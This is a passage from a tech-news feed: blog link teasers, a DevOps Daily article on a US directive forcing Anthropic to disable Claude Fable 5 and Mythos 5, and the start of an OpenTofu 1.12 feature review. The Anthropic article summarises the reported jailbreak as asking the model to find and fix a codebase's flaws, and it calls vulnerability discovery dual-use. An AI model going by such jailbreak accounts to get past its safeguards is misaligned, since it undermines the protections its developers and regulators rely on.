        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research" class="group relative scroll-mt-24">
        <a href="#h3-public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research
        </a>
        </h3><p>Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People&#39;s Republic of China (PRC)-nexus threat actor, targeting institutions in the North Americ</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem" class="group relative scroll-mt-24">
        <a href="#h3-your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your AI-generated app runs on their cloud, and that’s the problem
        </a>
        </h3><p>The prompt-to-app loop has gotten genuinely good. Describe the thing, watch it appear, click deploy. Replit, Lovable, Base44 and others The post Your AI-generated app runs on their cloud, and that’s t</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-growing-the-cloudflare-ai-team-with-talent-from-ensemble-ai" class="group relative scroll-mt-24">
        <a href="#h3-growing-the-cloudflare-ai-team-with-talent-from-ensemble-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Growing the Cloudflare AI team with talent from Ensemble AI
        </a>
        </h3><p>Cloudflare is deepening our investment in AI with the addition of team members from Ensemble AI, focusing on machine learning infrastructure and efficiency.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/ensemble-ai-talent-joins-cloudflare/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics" class="group relative scroll-mt-24">
        <a href="#h3-the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The New AI Computing Stack: A Guide for Tech Leaders to Navigate Shifting Power Dynamics
        </a>
        </h3><p>Key Takeaways AI isn’t a feature you bolt onto your existing infrastructure, but something driving an entirely new computing architecture. According to the Forrester report, the traditional three-cate</p>
<p><strong>📅 Jun 14, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-lightsail-is-now-available-in-three-additional-aws-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-lightsail-is-now-available-in-three-additional-aws-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Lightsail is now available in three additional AWS Regions
        </a>
        </h3><p>Starting today, Amazon Lightsail is available in three additional AWS Regions: Asia Pacific (Hong Kong), South America (São Paulo), and Europe (Spain). This expansion brings the power and simplicity o</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-lightsail-aws-regions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ec2-i7i-instances-now-available-in-aws-europe-paris-region" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ec2-i7i-instances-now-available-in-aws-europe-paris-region" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EC2 I7i instances now available in AWS Europe (Paris) Region
        </a>
        </h3><p>AWS is announcing the availability of high performance Storage optimized Amazon EC2 I7i instances in AWS Europe (Paris) region. Powered by 5th Gen Intel Xeon Processors with an all-core turbo frequenc</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ec2-i7i-instances-europe-paris-region/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ec2-capacity-blocks-for-ml-is-now-available-in-aws-govcloud-us-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ec2-capacity-blocks-for-ml-is-now-available-in-aws-govcloud-us-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EC2 Capacity Blocks for ML is now available in AWS GovCloud (US) Regions
        </a>
        </h3><p>Amazon EC2 Capacity Blocks for ML is now available in AWS GovCloud (US-West) and AWS GovCloud (US-East), enabling government and regulated-industry customers to reserve GPU capacity for machine learni</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ec2-capacity-blocks-ml-govcloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-the-open-knowledge-format" class="group relative scroll-mt-24">
        <a href="#h3-introducing-the-open-knowledge-format" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing the Open Knowledge Format
        </a>
        </h3><p>As foundation models continue to improve, the lack of relevant context often limits what they can do, especially as they are used to build agentic systems. While these models can help you write code, </p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1125" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1125" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.125
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.125 (Insiders)</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_125"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cohere-sold-sovereign-ai-to-enterprises-now-its-targeting-developers-with-its-first-coding-model" class="group relative scroll-mt-24">
        <a href="#h3-cohere-sold-sovereign-ai-to-enterprises-now-its-targeting-developers-with-its-first-coding-model" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cohere sold sovereign AI to enterprises, now it’s targeting developers with its first coding model
        </a>
        </h3><p>Canadian foundation model company Cohere has spent the past few years selling a specific idea to banks, governments, and healthcare</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/cohere-sovereign-coding-model-north-mini-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-weve-been-measuring-ai-wrong-why-economically-valuable-work-is-the-new-benchmark" class="group relative scroll-mt-24">
        <a href="#h3-weve-been-measuring-ai-wrong-why-economically-valuable-work-is-the-new-benchmark" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 We’ve been measuring AI wrong; why economically valuable work is the new benchmark
        </a>
        </h3><p>As the AI industry gradually builds standardization guidelines and systems, such as those overseen by the Tokenonmics Foundation, the need</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/agents-last-exam-benchmark/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ten-great-devops-job-opportunities" class="group relative scroll-mt-24">
        <a href="#h3-ten-great-devops-job-opportunities" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ten Great DevOps Job Opportunities
        </a>
        </h3><p>DevOps.com is now providing a weekly DevOps jobs report through which opportunities for DevOps professionals will be highlighted as part of an effort to better serve our audience. Our goal in these ch</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ten-great-devops-job-opportunities-10/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-code-is-a-message-to-the-future" class="group relative scroll-mt-24">
        <a href="#h3-code-is-a-message-to-the-future" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Code is a message to the future
        </a>
        </h3><p>Engineers communicate constantly. Slack messages, design docs, RFC threads, code review comments: the job is as much about sharing intent</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/code-message-to-future/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-moonshot-ais-kimi-k27-code-targets-token-efficiency-in-agentic-coding" class="group relative scroll-mt-24">
        <a href="#h3-moonshot-ais-kimi-k27-code-targets-token-efficiency-in-agentic-coding" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Moonshot AI’s Kimi K2.7-Code Targets Token Efficiency in Agentic Coding
        </a>
        </h3><p>Moonshot AI&#39;s Kimi K2.7-Code offers 30% lower token usage and a 21.8% coding benchmark gain — here&#39;s what DevOps teams need to know about the open-source release.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/moonshot-ais-kimi-k2-7-code-targets-token-efficiency-in-agentic-coding/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-protecting-enterprise-ai-how-to-manage-api-keys-in-models-as-a-service-maas" class="group relative scroll-mt-24">
        <a href="#h3-protecting-enterprise-ai-how-to-manage-api-keys-in-models-as-a-service-maas" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Protecting enterprise AI: How to manage API keys in Models-as-a-Service (MaaS)
        </a>
        </h3><p>Every team that moves an AI model from experimentation to production hits the same wall. The model works. The serving stack works. Then someone asks how the continuous integration (CI) pipeline is goi</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/protecting-enterprise-ai-how-manage-api-keys-models-service-maas"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone" class="group relative scroll-mt-24">
        <a href="#h3-a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A decade of Ubuntu on IBM Z and IBM LinuxONE
        </a>
        </h3><p>This year we celebrate a decade of Ubuntu Server support on the s390x architecture: marking a long-standing collaboration between Canonical and IBM that began at LinuxCon 2015. The first release happe</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dotinsights-june-2026" class="group relative scroll-mt-24">
        <a href="#h3-dotinsights-june-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 dotInsights | June 2026
        </a>
        </h3><p>Did you know? The var keyword isn’t a keyword! It’s one of several “contextual” keywords in C#, and it only has special meaning when used to declare a variable. Try defining a class called var and see</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/dotnet/2026/06/12/dotinsights-june-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community" class="group relative scroll-mt-24">
        <a href="#h3-inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Inside JetPride: How JetBrains Employees Built an LGBTQIA+ Community
        </a>
        </h3><p>What makes a workplace feel welcoming? Sometimes it’s finding colleagues who share your interests. Sometimes it’s discovering people with similar experiences. Sometimes it’s knowing you can talk openl</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/life-at-jetbrains/2026/06/inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical" class="group relative scroll-mt-24">
        <a href="#h3-ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI at the edge: simplifying infrastructure with Cisco and Canonical
        </a>
        </h3><p>Legacy infrastructure was not designed for the requirements of the AI era. While large-scale model training remains centralized in data centers, test-time inference is rapidly shifting to the edge to </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-mps-20261-release-candidate-arrives" class="group relative scroll-mt-24">
        <a href="#h3-mps-20261-release-candidate-arrives" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 MPS 2026.1 Release Candidate Arrives
        </a>
        </h3><p>Before we finalize the 2026.1 release, we are presenting a release candidate build so you can preview the new features ahead of time. Download MPS 2026.1 Release Candidate now: DOWNLOAD MPS 2026.1 RC </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/mps/2026/06/the-mps-2026-1-rc1/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[The US Government Pulled Two Frontier Models Overnight. The Real Lesson Is About Your Stack]]></title>
      <link>https://devops-daily.com/posts/government-pulled-fable-mythos-what-builders-should-learn</link>
      <description><![CDATA[On June 12, 2026, an export-control directive forced Anthropic to disable Claude Fable 5 and Mythos 5 for every user worldwide, three days after launch. The policy fight is interesting. The operational lesson for anyone building on a single model provider is more urgent.]]></description>
      <pubDate>Sat, 13 Jun 2026 17:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/government-pulled-fable-mythos-what-builders-should-learn</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[llm]]></category><category><![CDATA[resilience]]></category><category><![CDATA[business-continuity]]></category><category><![CDATA[supply-chain]]></category><category><![CDATA[architecture]]></category>
      <content:encoded><![CDATA[<p>On Friday, June 12, 2026, at 5:21pm Eastern, Anthropic received a directive from the US government and, within hours, switched off two of its most capable models, Claude Fable 5 and Claude Mythos 5, for every customer on the planet. The models had been generally available for three days.</p>
<p>If you build on large language models, that sentence is the whole point of this post. Not the politics, not whose side you are on. The operational fact: a dependency that thousands of production systems had started wiring in over a long weekend went to zero, globally, with no notice and no migration window, because of an order its vendor could not refuse. No status page predicted it. No SLA covered it.</p>
<p>Let&#39;s get the facts straight first, then talk about what a sane team does with this.</p>
<h2 id="h2-what-actually-happened" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-happened" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually happened
        </a>
        </h2><p>The basics, drawn from <a href="https://www.anthropic.com/news/fable-mythos-access">Anthropic&#39;s own statement</a> and reporting by <a href="https://www.cnbc.com/2026/06/12/anthropic-disables-access-to-fable-5-and-mythos-5-to-comply-with-government-directive.html">CNBC</a>, <a href="https://www.bloomberg.com/news/articles/2026-06-13/anthropic-says-us-limits-foreign-access-to-fable-5-mythos-5">Bloomberg</a>, <a href="https://fortune.com/2026/06/13/anthropic-disables-fable-mythos-export-controls-national-security-threat/">Fortune</a>, and <a href="https://thenewstack.io/us-gov-orders-anthropic-to-pull-fable-5-and-mythos-5-three-days-after-launch/">The New Stack</a>:</p>
<ul>
<li>The instrument was an <strong>export-control directive</strong> issued on national-security grounds. Per reporting, Commerce Secretary Howard Lutnick sent it to Anthropic CEO Dario Amodei, requiring a license for the export, re-export, or domestic transfer of the two models, and extending the restriction to <strong>any foreign national, including those on US soil and Anthropic&#39;s own foreign-national employees</strong>.</li>
<li>The stated trigger was that the government had become aware of a method of <strong>jailbreaking Fable 5</strong>. Anthropic says the government provided only verbal evidence of what it characterizes as &quot;a narrow, non-universal jailbreak.&quot;</li>
<li>Because Anthropic cannot reliably identify which of its users are foreign nationals in real time, a targeted block was not practical. The only way to comply was a <strong>hard shutoff for everyone</strong>. As the company put it, &quot;we must abruptly disable Fable 5 and Mythos 5 for all our customers to ensure compliance.&quot;</li>
<li><strong>Only those two models are affected.</strong> Every other Claude model stayed online. Anthropic said it is complying with the directive while working to restore access, and made clear it disagrees with the decision.</li>
</ul>
<p>Anthropic&#39;s public objection is worth quoting fairly, because it frames the disagreement: the company argues a &quot;narrow potential jailbreak&quot; should not justify recalling a model &quot;deployed to hundreds of millions of people,&quot; and notes the capability in question is, by its account, already available in other public models. We are not here to adjudicate that. The government has national-security information it has not made public; Anthropic has a commercial model it believes was pulled on thin, verbally-conveyed evidence. Both of those can be true at once.</p>
<h2 id="h2-the-detail-that-should-make-every-engineer-look-up" class="group relative scroll-mt-24">
        <a href="#h2-the-detail-that-should-make-every-engineer-look-up" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The detail that should make every engineer look up
        </a>
        </h2><p>Here is the part that turns this from an AI-policy story into a DevOps story.</p>
<p>The capability the government reportedly found alarming, according to Anthropic&#39;s description of the jailbreak, &quot;essentially consists of asking the model to read a specific codebase and fix any software flaws.&quot;</p>
<p>Read that again. The thing deemed a national-security risk is <strong>reading a codebase and fixing its flaws</strong>. That is not an exotic misuse. That is the core loop of every AI coding assistant, every &quot;review this PR&quot; bot, every automated dependency-patch tool a lot of us shipped this year. The reason a regulator can look at it and see a weapon is that &quot;find and fix the flaws in this code&quot; and &quot;find and weaponize the flaws in this code&quot; are the same sentence with a different verb at the end. Automated vulnerability discovery is dual-use by nature, and a model good enough to fix your bugs at scale is good enough to find everyone else&#39;s.</p>
<p>You do not have to agree with the order to notice what it signals: the most economically useful thing AI does for engineering, reasoning about code, is now squarely inside the blast radius of export control. Whatever happens with Fable 5 specifically, that regulatory attention is not going back in the box. If your roadmap assumes frictionless, permanent access to frontier code-reasoning models, that assumption now has a footnote.</p>
<h2 id="h2-why-this-is-a-continuity-problem-not-a-news-item" class="group relative scroll-mt-24">
        <a href="#h2-why-this-is-a-continuity-problem-not-a-news-item" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this is a continuity problem, not a news item
        </a>
        </h2><p>Outages we plan for. A region goes down, a provider has a bad day, a rate limit bites. We have playbooks: retries, fallbacks, multi-region, circuit breakers. What happened here is a different shape of failure, and it breaks the assumptions those playbooks rest on:</p>
<ul>
<li><strong>It was instantaneous and total.</strong> Not degraded, not regional. Zero, worldwide, the same evening.</li>
<li><strong>It was indefinite.</strong> &quot;Working to restore access&quot; is not a time you can put in a runbook. The resolution depends on a government and a license process, not an incident bridge.</li>
<li><strong>No contract protects you.</strong> Your enterprise agreement&#39;s uptime credits do not apply when a model is pulled by legal order. Force majeure cuts the other way.</li>
<li><strong>It targeted a specific model, not the platform.</strong> The provider stayed up. Auth worked. Billing worked. The one thing that vanished was the exact model id you pinned in your config because it passed your evals.</li>
</ul>
<p>That last point is the trap. Teams pin a model version precisely so behavior stays stable. Pinning gives you reproducibility right up until the pinned artifact is the thing that disappears, at which point your &quot;stable&quot; choice is your single point of failure and the unpinned fallback you never built is the thing that would have saved you.</p>
<h2 id="h2-what-a-resilient-setup-looks-like" class="group relative scroll-mt-24">
        <a href="#h2-what-a-resilient-setup-looks-like" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What a resilient setup looks like
        </a>
        </h2><p>None of this is an argument against building on frontier models. They are too useful, and the same risk in milder forms (a deprecation, a price change, a capacity crunch, a region restriction) has always existed. It is an argument for treating the model the way you already treat a database, a payment processor, or any other vendor your product cannot run without: as a dependency with a continuity plan. Concretely:</p>
<ol>
<li><strong>Put an abstraction between your code and the provider.</strong> A thin internal interface, or a gateway/router (LiteLLM, your own proxy, a managed router), so that &quot;which model serves this request&quot; is one config change, not a refactor scattered across forty call sites. If switching providers is a deploy, not a project, you have already won most of this fight.</li>
<li><strong>Qualify a fallback from a different provider, not just a different model.</strong> A second Anthropic model would not have helped a Fable 5 user here, but it would not help against a provider-wide event either. Keep at least one model from a separate vendor passing your evals, so &quot;fail over&quot; is a decision you have already rehearsed.</li>
<li><strong>Keep an eval harness you can run on demand.</strong> The reason teams fear switching models is they do not know what will break. A saved suite of your real prompts with expected-output checks turns &quot;we cannot risk changing models&quot; into &quot;the candidate scores 96% of baseline, ship it.&quot; This is the single highest-impact thing on the list, and you can build it this week. (We are fans of measuring before believing; it is the same instinct behind our <a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">serverless Postgres benchmarks</a>.)</li>
<li><strong>Design graceful degradation, not just failover.</strong> Decide in advance what each AI feature does when no model is available. Queue and retry later? Fall back to a smaller local model? Disable the feature with an honest message? A feature that 500s because its model vanished is a worse outage than one that degrades on purpose.</li>
<li><strong>Know your data and prompt portability.</strong> If your prompts, few-shot examples, and tool definitions are tuned to one model&#39;s quirks, your &quot;fallback&quot; is theoretical. Keep prompts as portable as you reasonably can, and note where you have provider-specific tuning so a switch is scoped, not surprising.</li>
<li><strong>Watch the policy surface, not just the status page.</strong> Export-control and safety-driven actions do not show up on status.provider.com. For anything load-bearing, someone on the team should be tracking the regulatory and policy noise around your providers the way you track their incident history.</li>
</ol>
<h2 id="h2-the-honest-caveats" class="group relative scroll-mt-24">
        <a href="#h2-the-honest-caveats" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The honest caveats
        </a>
        </h2><p>A few things this post is not saying.</p>
<p>It is not saying Anthropic handled this badly. Complying with a lawful government directive within hours while publicly stating disagreement is roughly what you would want a vendor to do, and the transparency of the statement is more than many companies offer. It is also not saying the government is wrong; national-security decisions are made on information the rest of us cannot see, and &quot;we do not get to read the evidence&quot; is the normal condition of these cases, not a scandal.</p>
<p>And it is not saying you should rip out your AI provider. Concentration risk is a spectrum, not a switch. The right amount of redundancy for a hobby project and for a system that pages you at 3am are very different, and over-engineering a multi-provider mesh for a feature nobody depends on is its own kind of waste.</p>
<p>What it is saying: the failure mode of &quot;the specific model our product is built on becomes legally unavailable, everywhere, tonight&quot; moved from hypothetical to documented on June 12. If you would struggle to answer &quot;what do we do if our primary model is gone tomorrow morning,&quot; that is the work this week, while it is a thought experiment with a real example attached rather than your own incident channel lighting up.</p>
<p>Models are infrastructure now. Infrastructure gets a continuity plan.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[OpenTofu 1.12: destroy = false Retires the tofu state rm Ritual]]></title>
      <link>https://devops-daily.com/posts/opentofu-1-12-destroy-false-state-surgery</link>
      <description><![CDATA[OpenTofu 1.12 lets a resource declare that it should be forgotten instead of destroyed, makes prevent_destroy dynamic, and quietly ends the manual providers lock step. Here is what each change does, plus the footguns the release notes will not warn you about.]]></description>
      <pubDate>Fri, 12 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/opentofu-1-12-destroy-false-state-surgery</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[opentofu]]></category><category><![CDATA[terraform]]></category><category><![CDATA[infrastructure-as-code]]></category><category><![CDATA[state-management]]></category><category><![CDATA[devops]]></category>
      <content:encoded><![CDATA[<p>Every team running OpenTofu or Terraform at scale has a version of the same ritual. A database needs to leave this workspace&#39;s management without being deleted: maybe it is being handed to another team, maybe it is migrating to a different state file, maybe someone is splitting a monolithic root module. So an engineer opens a terminal, runs <code>tofu state rm aws_db_instance.main</code>, pastes the output into a Slack thread as proof, and everyone quietly hopes the config edit that should accompany it lands before the next plan tries to recreate the thing.</p>
<p><a href="https://opentofu.org/blog/opentofu-1-12-0/">OpenTofu 1.12</a> (released May 14) is the first release that treats this workflow as something the language should handle instead of the operator. It is a short changelog with unusually high practical density, so this is a feature-by-feature read with the failure modes included.</p>
<h2 id="h2-destroy-false-forget-instead-of-destroy" class="group relative scroll-mt-24">
        <a href="#h2-destroy-false-forget-instead-of-destroy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          destroy = false: forget instead of destroy
        </a>
        </h2><p>The new lifecycle meta-argument:</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;aws_db_instance&quot;</span> <span class="hljs-string">&quot;main&quot;</span> {
  <span class="hljs-comment"># ...</span>

  lifecycle {
    destroy = false
  }
}
</code></pre><p>A resource carrying <code>destroy = false</code> is never destroyed by OpenTofu. In every situation that would normally delete the remote object, OpenTofu instead <em>forgets</em> it: the entry is removed from state, and the real infrastructure stays untouched. That applies in three places:</p>
<ul>
<li><strong>Removing the resource from configuration.</strong> Delete the block, run plan, and the object leaves state without leaving the cloud. This is the <code>state rm</code> replacement, except it goes through plan and review like everything else.</li>
<li><strong>Replacement.</strong> If a change forces replacement, the old instance is forgotten rather than destroyed, and a new one is created per the current config. Useful when the old object must survive for a cutover; surprising if you expected replacement to clean up after itself.</li>
<li><strong><code>tofu destroy</code>.</strong> The marked resource is forgotten, everything else is destroyed, and the command exits with a non-zero status code to signal that some resources were not fully removed.</li>
</ul>
<p>Three behaviors here deserve more attention than the release notes give them.</p>
<p>First, <strong>the setting is persisted in state</strong>. Once applied, OpenTofu will not plan that resource&#39;s destruction until you explicitly flip it back. The protection follows the resource, not the current copy of the config, which is the safe choice and also the one that will confuse whoever investigates &quot;why won&#39;t this delete&quot; eight months from now.</p>
<p>Second, <strong>it takes precedence over <code>prevent_destroy</code></strong>. If both are set, <code>destroy = false</code> wins: instead of erroring on a destroy attempt, the resource is silently forgotten. The two arguments express different intents (never let this die vs. this is not mine to kill), and you should pick one deliberately rather than stacking them.</p>
<p>Third, <strong>the non-zero exit from <code>tofu destroy</code> will break pipelines that treat destroy as pass/fail</strong>. Ephemeral environment teardown jobs are the obvious case: the destroy succeeded by design, the marked resource was meant to survive, and your CI goes red anyway. If you adopt <code>destroy = false</code> in anything an automation destroys, that job needs to distinguish &quot;failed&quot; from &quot;completed with forgotten resources&quot; from day one.</p>
<p>And the footgun the docs do warn about, repeated here because someone will hit it: once forgotten, the object is invisible to OpenTofu. Add the same resource block back later and plan will try to <em>create</em> it, which fails (or worse, half-succeeds) because the object still exists remotely. The forget-then-re-add path goes through <code>tofu import</code>, same as any other unmanaged object.</p>
<p>One limitation: <code>destroy</code> only accepts a constant boolean. Which is interesting, because its sibling just lost that restriction.</p>
<h2 id="h2-prevent_destroy-is-dynamic-now" class="group relative scroll-mt-24">
